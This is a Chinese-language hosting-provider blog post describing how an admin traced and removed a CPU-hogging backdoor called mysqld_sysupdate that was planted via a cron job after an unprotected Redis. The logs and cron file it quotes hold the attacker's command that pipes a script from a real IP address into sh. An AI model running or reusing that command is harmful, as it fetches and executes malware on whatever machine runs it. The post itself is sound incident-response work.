查杀linux下隐蔽后门mysqld_sysupdate
    文章作者:恒爱云[恒爱网络] 阅读次数:1357 发布时间:2024-12-26

    [root@cloud /]# top  
    top - 18:27:40 up  1:21,  1 user,  load average: 7.01, 6.64, 6.19
    Tasks: 182 total,   5 running, 177 sleeping,   0 stopped,   0 zombie
    %Cpu(s): 79.9 us, 16.5 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  3.6 si,  0.0 st
    KiB Mem :  3871128 total,   164512 free,  3466028 used,   240588 buff/cache
    KiB Swap:   524284 total,   423932 free,   100352 used.   173384 avail Mem

      PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
     4156 www       20   0 2446920   2.3g      8 S 294.7 62.3 253:43.70 mysqld_sysupdat
       47 root      20   0       0      0      0 R  49.2  0.0  27:31.46 kswapd0
    14312 root      20   0  317948  40368   8672 R  26.7  1.0   0:01.65 python
     2387 root      20   0  596396  75500   5500 S   3.6  2.0   1:24.56 BT-Panel

    14396 root      20   0  112992   4484   3432 S   1.0  0.1   0:00.03 sshd


    通过top命令发现  PID为 4156 的名为  mysqld_sysupdat的进程CPU异常。达到了 294..7%


    [root@cloud /]# systemctl status 4156
    ● session-5.scope - Session 5 of user www
       Loaded: loaded (/run/systemd/system/session-5.scope; static; vendor preset: disabled)
      Drop-In: /run/systemd/system/session-5.scope.d
               └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
       Active: active (running) since 四 2024-12-26 17:15:01 CST; 1h 16min ago
       CGroup: /user.slice/user-1000.slice/session-5.scope
               ├─3401 /usr/sbin/CROND -n
               ├─3403 /bin/sh -c curl -k -fsSL http://13.93.132.26/mysql_check.sh | sh
               ├─3406 sh
               ├─3442 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t -f www
               ├─3451 /usr/sbin/postdrop -r

               └─4156 ./mysqld_sysupdate

    以上涉及的树形进程ID等会全kill掉


    12月 26 17:15:01 cloud systemd[1]: Started Session 5 of user www.
    12月 26 17:15:01 cloud CROND[3403]: (www) CMD (curl -k -fsSL http://13.93.132.26/mysql_check.sh | sh)
    12月 26 17:15:02 cloud crontab[3775]: (www) LIST (www)

    12月 26 17:15:12 cloud crontab[4150]: (www) LIST (www)

    以上日期记录 CROND 说明是通 任务计划 下载并编译的后门程序。


    crontab -l  查看定时计划里并没有可疑 。

    这时还有个路径需要单独检查一下。那就是 /var/spool/cron  这目录下的文件也会自动自行,但未必会出现在crontab 里。

    cd /var/spool/cron   #这也是一个定时任务文件的存放目录。这个目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名。

    ls 一下发现有2个文件  root   和  www


    cat www 显示正式是前面说的下载脚本 -c curl -k -fsSL http://13.93.132.26/mysql_check.sh | sh ,删除之。


    查询发现用户安装的 Redis 7.2.4 竟然是空密码。果断修改!





    推荐产品

    产品与服务

    快速通道

    关于我们

    联系我们

    关注我们

    Copyright © 2021当前负载均衡线路【2】 | 版权所有 鲁ICP备16043677号-2 QQ客服在线时间:周一至周六 AM 8-12点 PM 14-18点 19-21点   企业QQ:800881098 点击这里给我发消息

    在线客服
    企业QQ: 800881098
    在线咨询: QQ:2355398609
    技术QQ: QQ:2355398608

    服务热线

    固话: 0632-3081559
    热线: 400-926-0677

    恒爱网络公众号